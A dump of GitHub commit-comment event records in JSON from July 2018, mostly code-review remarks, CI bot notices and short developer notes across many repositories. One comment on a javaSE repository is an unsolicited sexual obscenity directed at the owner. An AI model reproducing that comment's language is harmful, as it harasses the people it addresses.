{"id":"7959239296","type":"CommitCommentEvent","actor":{"login":"ZchiPitt"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692656,"position":20,"line":249,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"236b7b9991a746491f9d631fdce39cc9e47d7892","created_at":"2018-07-12T23:29:42Z","updated_at":"2018-07-12T23:29:42Z","author_association":"OWNER","body":"Should be same in the context of execution efficiency? I wrote this just for the sake of make kernel function cleaner."}},"created_at":"2018-07-12T23:29:42Z"}
{"id":"7959239624","type":"CommitCommentEvent","actor":{"login":"ipmb"},"repo":{"name":"lincolnloop/goodconf"},"payload":{"comment":{"id":29692657,"position":35,"line":56,"path":"README.rst","commit_id":"332b925ad15bc655fdf71cb34147035653de8e62","created_at":"2018-07-12T23:29:48Z","updated_at":"2018-07-12T23:29:48Z","author_association":"MEMBER","body":"This isn't formatting properly on GitHub"}},"created_at":"2018-07-12T23:29:48Z"}
{"id":"7959239721","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29692658,"position":null,"line":null,"path":null,"commit_id":"44eeee9121d0017b0e8dd479fe7d06e4387ac9b2","created_at":"2018-07-12T23:29:50Z","updated_at":"2018-07-12T23:29:50Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/44eeee9121d0017b0e8dd479fe7d06e4387ac9b2/index.html"}},"created_at":"2018-07-12T23:29:50Z"}
{"id":"7959245003","type":"CommitCommentEvent","actor":{"login":"timotheecour"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":29692675,"position":null,"line":null,"path":null,"commit_id":"6de52d2b747074e993707adca2f74143134ce127","created_at":"2018-07-12T23:31:35Z","updated_at":"2018-07-12T23:31:35Z","author_association":"CONTRIBUTOR","body":"cleanup won't happen when execShellCmd !=0\r\n\r\nwhat about:\r\n```nim\r\ndefer:\r\n  #cleanup code here\r\nif os.execShellCmd(os.getAppFilename() & \" \" & backend & \" --nimcache:\" & nimcache & \" -r \" & outp) != 0:\r\n     quit \"[Examples] failed\"\t     quit \"[Examples] failed\"\r\n```\r\n(the failure execShellCmd could occur AFTER nimcache is created, we can't know)\r\n"}},"created_at":"2018-07-12T23:31:35Z"}
{"id":"7959245079","type":"CommitCommentEvent","actor":{"login":"dsherret"},"repo":{"name":"dsherret/ts-simple-ast"},"payload":{"comment":{"id":29692676,"position":null,"line":null,"path":null,"commit_id":"4b57519164d4dba7ad7d5e56149e8712187d79bf","created_at":"2018-07-12T23:31:37Z","updated_at":"2018-07-12T23:31:37Z","author_association":"OWNER","body":"Hmmm... I guess squash commits show me as a contributor as well? I wasn't expecting that 😕 "}},"created_at":"2018-07-12T23:31:37Z"}
{"id":"7959247515","type":"CommitCommentEvent","actor":{"login":"ZchiPitt"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692682,"position":60,"line":2502,"path":"tests/unittests/OperatorTest.cpp","commit_id":"236b7b9991a746491f9d631fdce39cc9e47d7892","created_at":"2018-07-12T23:32:31Z","updated_at":"2018-07-12T23:32:31Z","author_association":"OWNER","body":"Probably stick to naming with Elementwise right now. I found that there are other data parallel instructions that i havent implemented and tested. Rn we only have element-wise ops"}},"created_at":"2018-07-12T23:32:31Z"}
{"id":"7959251481","type":"CommitCommentEvent","actor":{"login":"lazarljubenovic"},"repo":{"name":"dsherret/ts-simple-ast"},"payload":{"comment":{"id":29692691,"position":null,"line":null,"path":null,"commit_id":"4b57519164d4dba7ad7d5e56149e8712187d79bf","created_at":"2018-07-12T23:34:00Z","updated_at":"2018-07-12T23:34:00Z","author_association":"CONTRIBUTOR","body":"cancerberoSgx is the _author_, @dsherret you're the _committer_.\r\n\r\n> You may be wondering what the difference is between author and committer. The author is the person who originally wrote the work, whereas the committer is the person who last applied the work. So, if you send in a patch to a project and one of the core members applies the patch, both of you get credit — you as the author, and the core member as the committer.\r\n\r\nFrom https://git-scm.com/book/en/v2/Git-Basics-Viewing-the-Commit-History"}},"created_at":"2018-07-12T23:34:00Z"}
{"id":"7959252425","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29692694,"position":null,"line":null,"path":null,"commit_id":"96307008965979f59ed78335faba0e71306a2b35","created_at":"2018-07-12T23:34:21Z","updated_at":"2018-07-12T23:34:21Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-41](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-41-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T23:34:21Z"}
{"id":"7959254895","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29692698,"position":null,"line":null,"path":null,"commit_id":"ccb0c1073a77201eed04084d346b198d20bce399","created_at":"2018-07-12T23:35:17Z","updated_at":"2018-07-12T23:35:17Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-481](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-481).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-481-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T23:35:17Z"}
{"id":"7959255364","type":"CommitCommentEvent","actor":{"login":"g5v991x"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29692699,"position":5,"line":113,"path":"libpyEM/qtgui/emplot2d.py","commit_id":"bcef833010c5859e2bf66403d87a0df2344ea5f6","created_at":"2018-07-12T23:35:29Z","updated_at":"2018-07-12T23:35:29Z","author_association":"CONTRIBUTOR","body":"Not sure.. I wasn’t in the qt group to start with. I just fix critical bugs when I run into them so I can work on other things.. edit those back if you want..\n\n> On Jul 12, 2018, at 5:52 PM, shadow_walker <notifications@github.com> wrote:\n> \n> Sorry, was this decided somewhere and did I miss it? The pull request now has merge conflicts.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-12T23:35:29Z"}
{"id":"7959255874","type":"CommitCommentEvent","actor":{"login":"dsherret"},"repo":{"name":"dsherret/ts-simple-ast"},"payload":{"comment":{"id":29692700,"position":null,"line":null,"path":null,"commit_id":"4b57519164d4dba7ad7d5e56149e8712187d79bf","created_at":"2018-07-12T23:35:41Z","updated_at":"2018-07-12T23:35:41Z","author_association":"OWNER","body":"@lazarljubenovic thanks! I was only looking at the pictures lol"}},"created_at":"2018-07-12T23:35:41Z"}
{"id":"7959257360","type":"CommitCommentEvent","actor":{"login":"alexyakunin"},"repo":{"name":"hypercodeplace/lazy-proxy"},"payload":{"comment":{"id":29692703,"position":1,"line":34,"path":"README.md","commit_id":"e8b79f4477c8140136d111b28e1a2289bdc9ee77","created_at":"2018-07-12T23:36:15Z","updated_at":"2018-07-12T23:36:15Z","author_association":"NONE","body":"\"the first\" -- \"the first\", \"the best\", \"the biggest\", etc."}},"created_at":"2018-07-12T23:36:15Z"}
{"id":"7959258587","type":"CommitCommentEvent","actor":{"login":"adamg88"},"repo":{"name":"CoreELEC/CoreELEC"},"payload":{"comment":{"id":29692706,"position":null,"line":null,"path":null,"commit_id":"defe20fd2528cab85b3722b646b0ddd41cff6a21","created_at":"2018-07-12T23:36:43Z","updated_at":"2018-07-12T23:36:43Z","author_association":"MEMBER","body":"Fixed, thanks for the bug report"}},"created_at":"2018-07-12T23:36:43Z"}
{"id":"7959266588","type":"CommitCommentEvent","actor":{"login":"alexyakunin"},"repo":{"name":"hypercodeplace/lazy-proxy"},"payload":{"comment":{"id":29692711,"position":38,"line":38,"path":"LazyProxy.Core/LazyProxyBuilder.cs","commit_id":"4a91adcc3cb2dd131115606dc273b8004e17b05d","created_at":"2018-07-12T23:39:39Z","updated_at":"2018-07-12T23:39:39Z","author_association":"NONE","body":"Any reason to use a string (typeName) instead of a raw type (type) as a key?"}},"created_at":"2018-07-12T23:39:39Z"}
{"id":"7959268196","type":"CommitCommentEvent","actor":{"login":"alexyakunin"},"repo":{"name":"hypercodeplace/lazy-proxy"},"payload":{"comment":{"id":29692714,"position":26,"line":26,"path":"LazyProxy.Core/LazyProxyBuilder.cs","commit_id":"4a91adcc3cb2dd131115606dc273b8004e17b05d","created_at":"2018-07-12T23:40:14Z","updated_at":"2018-07-12T23:40:14Z","author_association":"NONE","body":"-> ConcurrentDictionary<Type, Type> ?"}},"created_at":"2018-07-12T23:40:14Z"}
{"id":"7959270106","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692720,"position":20,"line":249,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"236b7b9991a746491f9d631fdce39cc9e47d7892","created_at":"2018-07-12T23:40:54Z","updated_at":"2018-07-12T23:40:54Z","author_association":"NONE","body":"I think they do not affect the performance and make the code more compact. But if e.g. CPU backend uses this expanded form everywhere, then you can follow their approach. You may even mention it in the comment."}},"created_at":"2018-07-12T23:40:54Z"}
{"id":"7959270289","type":"CommitCommentEvent","actor":{"login":"Hoab"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29692721,"position":null,"line":null,"path":null,"commit_id":"78e07dce2ab5ed3a7df2b254b853a7cc7ad0b0e8","created_at":"2018-07-12T23:40:58Z","updated_at":"2018-07-12T23:40:58Z","author_association":"NONE","body":"After 2 days it worked, but I am not sure I understand how it does work or what I did"}},"created_at":"2018-07-12T23:40:58Z"}
{"id":"7959274952","type":"CommitCommentEvent","actor":{"login":"keotal"},"repo":{"name":"keotal/humble-blog"},"payload":{"comment":{"id":29692723,"position":null,"line":null,"path":null,"commit_id":"2095403f27a7a55f473d3c1d875924c19e4aefbe","created_at":"2018-07-12T23:42:47Z","updated_at":"2018-07-12T23:42:47Z","author_association":"OWNER","body":"initial commit"}},"created_at":"2018-07-12T23:42:47Z"}
{"id":"7959275745","type":"CommitCommentEvent","actor":{"login":"akutuzov"},"repo":{"name":"RaRe-Technologies/gensim"},"payload":{"comment":{"id":29692729,"position":180,"line":143,"path":"gensim/models/keyedvectors.py","commit_id":"90c22fdbeeef11cb4cd2929053eee0ca0c409ba1","created_at":"2018-07-12T23:43:03Z","updated_at":"2018-07-12T23:43:03Z","author_association":"CONTRIBUTOR","body":"Is it intended that the reference to the newer `evaluate_word_analogies()` was restored to the deprecated `accuracy()` here?"}},"created_at":"2018-07-12T23:43:03Z"}
{"id":"7959286049","type":"CommitCommentEvent","actor":{"login":"hxrvt"},"repo":{"name":"hxrvt/source-tree-test"},"payload":{"comment":{"id":29692769,"position":null,"line":null,"path":null,"commit_id":"94d2a336ceb475f537a540bc738b1d4ce7119ca0","created_at":"2018-07-12T23:47:00Z","updated_at":"2018-07-12T23:47:00Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-12T23:47:00Z"}
{"id":"7959290020","type":"CommitCommentEvent","actor":{"login":"nvcervantes"},"repo":{"name":"nvcervantes/apc_softdev_mi151_04"},"payload":{"comment":{"id":29692775,"position":null,"line":null,"path":null,"commit_id":"78db770436022862514e7970c94df195629db166","created_at":"2018-07-12T23:48:29Z","updated_at":"2018-07-12T23:48:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FEM - Obtain sakay.ph source code](https://trello.com/c/slvKjRpm/27-fem-obtain-sakayph-source-code)"}},"created_at":"2018-07-12T23:48:29Z"}
{"id":"7959299351","type":"CommitCommentEvent","actor":{"login":"JorgeCanchon"},"repo":{"name":"JorgeCanchon/CiudadRecicla"},"payload":{"comment":{"id":29692798,"position":1,"line":1,"path":"README.md","commit_id":"457fda9b48419f9c112acf1e409395a18062c7cb","created_at":"2018-07-12T23:52:03Z","updated_at":"2018-07-12T23:52:03Z","author_association":"OWNER","body":"Proyecto  fedesoft"}},"created_at":"2018-07-12T23:52:03Z"}
{"id":"7959302902","type":"CommitCommentEvent","actor":{"login":"andgates"},"repo":{"name":"grepthink/grepthink"},"payload":{"comment":{"id":29692809,"position":46,"line":73,"path":"teamwork/apps/projects/test_views.py","commit_id":"72ddedbf62fcefc2c69f18f2bba08335f52a469b","created_at":"2018-07-12T23:53:24Z","updated_at":"2018-07-12T23:53:24Z","author_association":"MEMBER","body":"haha wat\r\n\r\nI'm trying to get this working right now. Not sure if I understand what the problem was before."}},"created_at":"2018-07-12T23:53:24Z"}
{"id":"7959307462","type":"CommitCommentEvent","actor":{"login":"brendon"},"repo":{"name":"savef/ranked-model"},"payload":{"comment":{"id":29692825,"position":null,"line":null,"path":null,"commit_id":"7242ba6630567ce75e91bf817b583a6f3d9ffd1a","created_at":"2018-07-12T23:55:05Z","updated_at":"2018-07-12T23:55:05Z","author_association":"NONE","body":"All good bro :)"}},"created_at":"2018-07-12T23:55:05Z"}
{"id":"7959311946","type":"CommitCommentEvent","actor":{"login":"mojodna"},"repo":{"name":"mojodna/tilelive-tmsource"},"payload":{"comment":{"id":29692833,"position":null,"line":null,"path":null,"commit_id":"55a52b91b32a936d75a5fd6736a88150612e25fa","created_at":"2018-07-12T23:56:46Z","updated_at":"2018-07-12T23:56:46Z","author_association":"OWNER","body":"Err, \"delegate\"."}},"created_at":"2018-07-12T23:56:46Z"}
{"id":"7959313724","type":"CommitCommentEvent","actor":{"login":"g5v991x"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29692835,"position":5,"line":113,"path":"libpyEM/qtgui/emplot2d.py","commit_id":"bcef833010c5859e2bf66403d87a0df2344ea5f6","created_at":"2018-07-12T23:57:29Z","updated_at":"2018-07-12T23:57:29Z","author_association":"CONTRIBUTOR","body":"oh.. i commented out this Tuesday because I thought it is not used. I added back later because I recalled the signal might be used in the eval refine in single particle workflow, where selecting a point triggers the display of particle and projection pair... ( I really just remembered this today when Michael mentioned writing eval refine for spt..)"}},"created_at":"2018-07-12T23:57:29Z"}
{"id":"7959313783","type":"CommitCommentEvent","actor":{"login":"jpokhrel1"},"repo":{"name":"jpokhrel1/jprakash"},"payload":{"comment":{"id":29692836,"position":1,"line":1,"path":"LICENSE.md/LICENSE.md","commit_id":"37e375a3e2d39f61c38f5e78fd88336d18fc4ef2","created_at":"2018-07-12T23:57:30Z","updated_at":"2018-07-12T23:57:30Z","author_association":"OWNER","body":"joomla administrator portal is not log in"}},"created_at":"2018-07-12T23:57:30Z"}
{"id":"7959317315","type":"CommitCommentEvent","actor":{"login":"andrewkm"},"repo":{"name":"lucko/LuckPerms"},"payload":{"comment":{"id":29692843,"position":null,"line":null,"path":null,"commit_id":"01ffe6ad5a6e273556e045accb12b5230d3a7f79","created_at":"2018-07-12T23:58:52Z","updated_at":"2018-07-12T23:58:52Z","author_association":"NONE","body":"@lucko wanted to confirm this has fixed our issue, thanks for your super quick support (would've tagged in discord but saw your AFK so didn't wanna ding your cell phone or whatever)."}},"created_at":"2018-07-12T23:58:52Z"}
{"id":"7953661984","type":"CommitCommentEvent","actor":{"login":"xiya18ab"},"repo":{"name":"xiya18ab/xiya18ab"},"payload":{"comment":{"id":29679493,"position":null,"line":null,"path":null,"commit_id":"6b51ab4b8e38de47acd125067c251ead0dd4ea44","created_at":"2018-07-12T03:00:04Z","updated_at":"2018-07-12T03:00:04Z","author_association":"OWNER","body":"It is too hard to understand = "}},"created_at":"2018-07-12T03:00:04Z"}
{"id":"7953664039","type":"CommitCommentEvent","actor":{"login":"tttt124566"},"repo":{"name":"tttt124566/0-10-"},"payload":{"comment":{"id":29679500,"position":28,"line":28,"path":"46-Permutations.java","commit_id":"3e529d1443074cb53b2e19fe0f267172e380b561","created_at":"2018-07-12T03:00:46Z","updated_at":"2018-07-12T03:00:46Z","author_association":"OWNER","body":"we need to create a new list based on the list"}},"created_at":"2018-07-12T03:00:46Z"}
{"id":"7953665606","type":"CommitCommentEvent","actor":{"login":"hayatoito"},"repo":{"name":"mizuki1029/google-step-tsp"},"payload":{"comment":{"id":29679501,"position":208,"line":208,"path":"tsp_ga_16.java","commit_id":"4787ea62f32648260885e86bbb62913fffa79bd1","created_at":"2018-07-12T03:01:21Z","updated_at":"2018-07-12T03:01:21Z","author_association":"NONE","body":"Arrays.fill が使用できます。\r\nhttps://docs.oracle.com/javase/9/docs/api/java/util/Arrays.html#fill-int:A-int-\r\n\r\nArrays.fill(route, -1);\r\n"}},"created_at":"2018-07-12T03:01:21Z"}
{"id":"7953673517","type":"CommitCommentEvent","actor":{"login":"sora10pls"},"repo":{"name":"kwsch/PKHeX"},"payload":{"comment":{"id":29679530,"position":null,"line":null,"path":null,"commit_id":"d20706dd706e277c5c73ec359b35fbbfcf4b6c04","created_at":"2018-07-12T03:04:21Z","updated_at":"2018-07-12T03:04:21Z","author_association":"CONTRIBUTOR","body":"let's go ( ͡° ͜ʖ ͡°)"}},"created_at":"2018-07-12T03:04:21Z"}
{"id":"7953674422","type":"CommitCommentEvent","actor":{"login":"Alhadis"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29679535,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-12T03:04:41Z","updated_at":"2018-07-12T03:04:41Z","author_association":"NONE","body":"I confess I've only skim-read this thread, so there may be something I'm missing... but are you *really* considering adding yet another `/[-A-Za-z]+(roff)/` name to the long list of `-roff` suffixes? Or have I misinterpreted?\r\n\r\n> I suggest to change the executable name `troff` to something else, e.g. add one or more prefix letters to be able to have old troff and the advanced troff installed at the same time. If there are no objections we should go this way.\r\n\r\nPersonally, I feel this is better implemented using a switch that's not in use (`--advanced`), or adding an extension level 4. It needn't be the default setting: users who are aware of the advanced functionality can enable it themselves..."}},"created_at":"2018-07-12T03:04:41Z"}
{"id":"7953675074","type":"CommitCommentEvent","actor":{"login":"hayatoito"},"repo":{"name":"mizuki1029/google-step-tsp"},"payload":{"comment":{"id":29679537,"position":null,"line":null,"path":null,"commit_id":"4787ea62f32648260885e86bbb62913fffa79bd1","created_at":"2018-07-12T03:04:57Z","updated_at":"2018-07-12T03:04:57Z","author_association":"NONE","body":"お疲れ様です。いくつかコメントしました。GA 自体についてはコメントしていません。\r\nそれ以外にも\r\n\r\n- インデント直したほうがよいかも。読みやすくなります。\r\n- java.util.Arrays を一度見ておいたほうがよいかもしれません。便利なメソッドがあります。\r\n- すべての箇所で array を使用していましたが、余裕があったら、java.util.ArrayList などの他のコレクションクラスを使用することを検討してみたほうがよいかも。そちらのほうが楽できる場面は多いです。"}},"created_at":"2018-07-12T03:04:57Z"}
{"id":"7953676424","type":"CommitCommentEvent","actor":{"login":"pegesmedia"},"repo":{"name":"nathvarun/Custom-React-Native-Snippets-Unsure-Programmer"},"payload":{"comment":{"id":29679545,"position":2,"line":12,"path":"README.md","commit_id":"cf21bf4050516a97887a8be7fa7cd3244fd1fe95","created_at":"2018-07-12T03:05:26Z","updated_at":"2018-07-12T03:05:26Z","author_association":"NONE","body":"didnt wrk fore me"}},"created_at":"2018-07-12T03:05:26Z"}
{"id":"7953699561","type":"CommitCommentEvent","actor":{"login":"accidentalmeme"},"repo":{"name":"rgrove/rawgit"},"payload":{"comment":{"id":29679603,"position":null,"line":null,"path":null,"commit_id":"1d38e173aa2b4ad2ad7074e93abb9ac8e0a7081e","created_at":"2018-07-12T03:14:34Z","updated_at":"2018-07-12T03:14:34Z","author_association":"NONE","body":"Why no pgp?"}},"created_at":"2018-07-12T03:14:34Z"}
{"id":"7953703510","type":"CommitCommentEvent","actor":{"login":"bradyt"},"repo":{"name":"bradyt/dart-mode"},"payload":{"comment":{"id":29679609,"position":23,"line":403,"path":"dart-mode.el","commit_id":"39cb7b65cb25e3e9611e0dbdf212eb6ea469f907","created_at":"2018-07-12T03:16:06Z","updated_at":"2018-07-12T03:16:06Z","author_association":"OWNER","body":"Not a good reason for the hex brackets. I hastily used hex for those when I ran into problems with `?(` and `?)`. I changed the square and curly brackets back from hex.\r\n\r\nThank you for catching the nesting, I was aware of the language feature, but didn't notice the regex fails. I improved the function.\r\n\r\nWill push these soon, thanks again.\r\n\r\nOn the subject of better fontification in nested string interpolation, I found an old related thread, on nested string interpolation in ruby-mode.el, at https://lists.gnu.org/archive/html/emacs-devel/2012-09/msg00245.html. One can dream. Syntax highlighting of tokens in string interpolation would be pretty nifty.\r\n"}},"created_at":"2018-07-12T03:16:06Z"}
{"id":"7953705103","type":"CommitCommentEvent","actor":{"login":"bradyt"},"repo":{"name":"bradyt/dart-mode"},"payload":{"comment":{"id":29679611,"position":35,"line":415,"path":"dart-mode.el","commit_id":"39cb7b65cb25e3e9611e0dbdf212eb6ea469f907","created_at":"2018-07-12T03:16:40Z","updated_at":"2018-07-12T03:16:40Z","author_association":"OWNER","body":"Thank you, changed in local, will push soon."}},"created_at":"2018-07-12T03:16:40Z"}
{"id":"7953705635","type":"CommitCommentEvent","actor":{"login":"natecrow"},"repo":{"name":"natecrow/my-destinations"},"payload":{"comment":{"id":29679613,"position":null,"line":null,"path":null,"commit_id":"515ade385f676800a379650a8fb278520da3cd3a","created_at":"2018-07-12T03:16:53Z","updated_at":"2018-07-12T03:16:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Delete destination list](https://trello.com/c/K8mRfU3O/9-delete-destination-list)"}},"created_at":"2018-07-12T03:16:53Z"}
{"id":"7953709047","type":"CommitCommentEvent","actor":{"login":"ramonmagalhaes"},"repo":{"name":"ramonmagalhaes/datasciencecoursera"},"payload":{"comment":{"id":29679620,"position":null,"line":null,"path":null,"commit_id":"0421141978126aa6d10151b403e742f1e4f85ecb","created_at":"2018-07-12T03:18:06Z","updated_at":"2018-07-12T03:18:06Z","author_association":"OWNER","body":"## This is a markdown file"}},"created_at":"2018-07-12T03:18:06Z"}
{"id":"7953709237","type":"CommitCommentEvent","actor":{"login":"lzl529"},"repo":{"name":"lzl529/resume"},"payload":{"comment":{"id":29679621,"position":null,"line":null,"path":null,"commit_id":"cea6849fe1a12e226b3045d99a909fa80a01797b","created_at":"2018-07-12T03:18:10Z","updated_at":"2018-07-12T03:18:10Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-12T03:18:10Z"}
{"id":"7953712933","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679628,"position":null,"line":null,"path":null,"commit_id":"82e4f93434f67a118dee10e388f5f0cbd365000e","created_at":"2018-07-12T03:19:34Z","updated_at":"2018-07-12T03:19:34Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T03:19:34Z"}
{"id":"7953714167","type":"CommitCommentEvent","actor":{"login":"abankrah"},"repo":{"name":"abankrah/Data_Science_Assignment_Session-4-Assignment-5.21287-"},"payload":{"comment":{"id":29679629,"position":null,"line":null,"path":null,"commit_id":"514b7f3194087ebc58bbe677a8daa1aa1320d312","created_at":"2018-07-12T03:20:04Z","updated_at":"2018-07-12T03:20:04Z","author_association":"OWNER","body":"![assignment_5txt](https://user-images.githubusercontent.com/39193389/42610756-ef9f5668-8560-11e8-937a-07f2aec8898b.PNG)\r\n"}},"created_at":"2018-07-12T03:20:04Z"}
{"id":"7953714495","type":"CommitCommentEvent","actor":{"login":"alabalei"},"repo":{"name":"lkx19950811/javaSE"},"payload":{"comment":{"id":29679630,"position":null,"line":null,"path":null,"commit_id":"403a51280649a3d2a7764238d5ce71c1b893b8cb","created_at":"2018-07-12T03:20:12Z","updated_at":"2018-07-12T03:20:12Z","author_association":"NONE","body":"I WANT TO FUCK YOU"}},"created_at":"2018-07-12T03:20:12Z"}
{"id":"7953716444","type":"CommitCommentEvent","actor":{"login":"mengyangbai"},"repo":{"name":"mengyangbai/onlinetest"},"payload":{"comment":{"id":29679633,"position":null,"line":null,"path":null,"commit_id":"10b23257a1dce83dc8822d582045c986c9a0d752","created_at":"2018-07-12T03:20:54Z","updated_at":"2018-07-12T03:20:54Z","author_association":"OWNER","body":"Good"}},"created_at":"2018-07-12T03:20:54Z"}
{"id":"7953718654","type":"CommitCommentEvent","actor":{"login":"QhenryQ"},"repo":{"name":"QhenryQ/QuantileRegression"},"payload":{"comment":{"id":29679636,"position":null,"line":null,"path":null,"commit_id":"e33a3fa64f511477af6f8e8ce4d5d25fb1a0f5fd","created_at":"2018-07-12T03:21:45Z","updated_at":"2018-07-12T03:21:45Z","author_association":"OWNER","body":"created by mistake"}},"created_at":"2018-07-12T03:21:45Z"}
{"id":"7953736079","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29679669,"position":null,"line":null,"path":null,"commit_id":"b96c8c0cf6166433e4e3528c6e4acb799d1d063f","created_at":"2018-07-12T03:28:52Z","updated_at":"2018-07-12T03:28:52Z","author_association":"CONTRIBUTOR","body":"Fix unbreaks comments at `blacklistednews.com` and `hiphoplately.com`.\r\nReenables the download functionality at `convertcase.net`"}},"created_at":"2018-07-12T03:28:52Z"}
{"id":"7953743497","type":"CommitCommentEvent","actor":{"login":"oskiegarcia"},"repo":{"name":"zuhlkef10/f10api-demo"},"payload":{"comment":{"id":29679683,"position":null,"line":null,"path":null,"commit_id":"decef1e63ee1c3d6bf74954aa5c71119e7256c70","created_at":"2018-07-12T03:31:51Z","updated_at":"2018-07-12T03:31:51Z","author_association":"COLLABORATOR","body":"Fixed Controller."}},"created_at":"2018-07-12T03:31:51Z"}
{"id":"7953745317","type":"CommitCommentEvent","actor":{"login":"burritoscott"},"repo":{"name":"lquijano/collaboration-practice"},"payload":{"comment":{"id":29679684,"position":9,"line":11,"path":"members.md","commit_id":"9d1e136eac84dc15fae467ca3e4c10d96b8e4df7","created_at":"2018-07-12T03:32:33Z","updated_at":"2018-07-12T03:32:33Z","author_association":"COLLABORATOR","body":"Add your name HERE 💃 "}},"created_at":"2018-07-12T03:32:33Z"}
{"id":"7953745972","type":"CommitCommentEvent","actor":{"login":"hannesa2"},"repo":{"name":"hannesa2/DbPreferences"},"payload":{"comment":{"id":29679688,"position":5,"line":6,"path":"DBPrefs/src/main/java/info/dbprefs/lib/ConfigKey.kt","commit_id":"3db06ed0302e3dac0060eaa73f25ff4375a35335","created_at":"2018-07-12T03:32:47Z","updated_at":"2018-07-12T03:32:47Z","author_association":"OWNER","body":"Same to this, when he uses a string and use an other name. Ok, when he use a variable he is out of this topic.\r\n`public static String GENDER = \"men\"`\r\nrename to\r\n`public static String CAR_COLOR = \"men\"`\r\nbut this not always makes sense\r\n\r\n\r\nBut when a user renames, he has to take care about this and should handle migration by himself.\r\nAgainst stupidity no herb has grown"}},"created_at":"2018-07-12T03:32:47Z"}
{"id":"7953754383","type":"CommitCommentEvent","actor":{"login":"marbleindex"},"repo":{"name":"marbleindex/verbose-engine"},"payload":{"comment":{"id":29679697,"position":null,"line":null,"path":null,"commit_id":"f66d25562a39ba8e905ae92b57145efdd352012c","created_at":"2018-07-12T03:36:15Z","updated_at":"2018-07-12T03:36:15Z","author_association":"OWNER","body":"That works"}},"created_at":"2018-07-12T03:36:15Z"}
{"id":"7953756567","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29679703,"position":116,"line":63,"path":"3-26a/3-26a.cpp","commit_id":"2f248aaf8e6f71f56938fcbfcde449c40235784a","created_at":"2018-07-12T03:37:09Z","updated_at":"2018-07-12T03:37:09Z","author_association":"COLLABORATOR","body":"山本　補足\r\nSwitch文では、上記以外のものが入った場合に、何も値が出力されないので\r\n「default」で想定外の値が入力されたことを出力した方がよいかと思われます。\r\n（入力値が「1.2」などの場合にはエラーになる可能性がある。ただし、「1.2」は整数型ではないので、入力は出来ないのかもしれないが、「default」について意識はした方がよい）"}},"created_at":"2018-07-12T03:37:09Z"}
{"id":"7953760561","type":"CommitCommentEvent","actor":{"login":"craneer"},"repo":{"name":"craneer/sample-cloud-native-toolchain-tutorial-20180518034150481"},"payload":{"comment":{"id":29679710,"position":null,"line":null,"path":null,"commit_id":"1109b44cd05fd2da7e701d780758e835b11443a2","created_at":"2018-07-12T03:38:51Z","updated_at":"2018-07-12T03:38:51Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/a25368d0-1ca9-4a96-a1fb-3a03dd5893c5?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180518034150481\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/379f9839-89e6-481d-b0e6-d7ccc392891f?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180518034150481\") deployed [sample-cloud-native-toolchain-tutorial-20180518034150481](https://github.com/craneer/sample-cloud-native-toolchain-tutorial-20180518034150481/releases/tag/deploy-ibm-yp-us-south-ecrane-us.ibm.com-test-20180712-033850 